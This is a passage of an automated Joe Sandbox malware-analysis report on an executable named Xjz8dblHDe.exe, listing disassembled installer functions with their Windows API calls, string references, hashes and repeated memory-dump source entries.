                                                                    • Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                    • Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
                                                                    • Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                    • Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18
                                                                    Function 00404ABB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                    • wsprintfW.USER32 ref: 00404B65
                                                                    • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                    • String ID: %u.%u%s%s
                                                                    • API String ID: 3540041739-3551169577
                                                                    • Opcode ID: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                                                    • Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
                                                                    • Opcode Fuzzy Hash: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                                                    • Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8
                                                                    Function 00402598 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WideCharToMultiByte.KERNEL32(?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,00000400,?,?,00000021), ref: 004025E8
                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nslC41E.tmp,?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,00000400,?,?,00000021), ref: 004025F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWidelstrlen
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nslC41E.tmp
                                                                    • API String ID: 3109718747-320761897
                                                                    • Opcode ID: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
                                                                    • Instruction ID: 4bb1670e371a3de23f361dcee459543bcfcf4636ee0f51b5b5a9e7d0ab821041
                                                                    • Opcode Fuzzy Hash: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
                                                                    • Instruction Fuzzy Hash: DB11CB72A05300BEDB046FB18E8999F7664AF54399F20843FF502F61D1D9FC89415B5E
                                                                    Function 00405C17 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C25
                                                                    • CharNextW.USER32(00000000), ref: 00405C2A
                                                                    • CharNextW.USER32(00000000), ref: 00405C42
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\nslC41E.tmp, xrefs: 00405C18
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: CharNext
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nslC41E.tmp
                                                                    • API String ID: 3213498283-320761897
                                                                    • Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                    • Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
                                                                    • Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                    • Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA
                                                                    Function 00405B6C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 00405B72
                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 00405B7C
                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B8E
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 2659869361-823278215
                                                                    • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                    • Instruction ID: 803477e47080facc391f0cecd2807ccdb00b9d1fdb40608b9d44cb66137c19bb
                                                                    • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                    • Instruction Fuzzy Hash: 3BD0A731501A30AAC111BB449D04DDF72ACDE45304342047FF101B31A2C7BC2D5287FD
                                                                    Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                    • GetTickCount.KERNEL32 ref: 00402EAA
                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                    • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                    • String ID:
                                                                    • API String ID: 2102729457-0
                                                                    • Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                    • Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
                                                                    • Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                    • Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC
                                                                    Function 00405C74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                      • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C25
                                                                      • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                      • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nslC41E.tmp,00000000,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405CCD
                                                                    • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nslC41E.tmp,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,00000000,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,C:\Users\user\AppData\Local\Temp\nslC41E.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 00405CDD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nslC41E.tmp
                                                                    • API String ID: 3248276644-320761897
                                                                    • Opcode ID: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                    • Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
                                                                    • Opcode Fuzzy Hash: f876970076993f733f9246bd8c2efe22564afd40dcf2357ec22258bdd39e6079
                                                                    • Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E
                                                                    Function 00405273 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 004052A2
                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004052F3
                                                                      • Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID:
                                                                    • API String ID: 3748168415-3916222277
                                                                    • Opcode ID: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                    • Instruction ID: beea61cd65c8703650dc93cdae6e0720761c29505c5582e3341eda9a3c117467
                                                                    • Opcode Fuzzy Hash: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                    • Instruction Fuzzy Hash: BD01BC71200608AFEB208F11DD80AAB3B25EF85355F20807FFA01761D0C73A8C919F2E
                                                                    Function 004038F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75923420,004038CA,004036E0,00000006,?,00000006,00000008,0000000A), ref: 0040390C
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00403913
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403904
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Free$GlobalLibrary
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 1100898210-823278215
                                                                    • Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                    • Instruction ID: 827a6d7c30b52d61f5a2dbff04e35f254d4b7381da6d9dc608e34789494937b8
                                                                    • Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
                                                                    • Instruction Fuzzy Hash: 58E0CD334010205BC6115F04FE0475A77685F45B22F16003BFC807717147B41C538BC8
                                                                    Function 00405BB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Xjz8dblHDe.exe,C:\Users\user\Desktop\Xjz8dblHDe.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBE
                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Xjz8dblHDe.exe,C:\Users\user\Desktop\Xjz8dblHDe.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BCE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
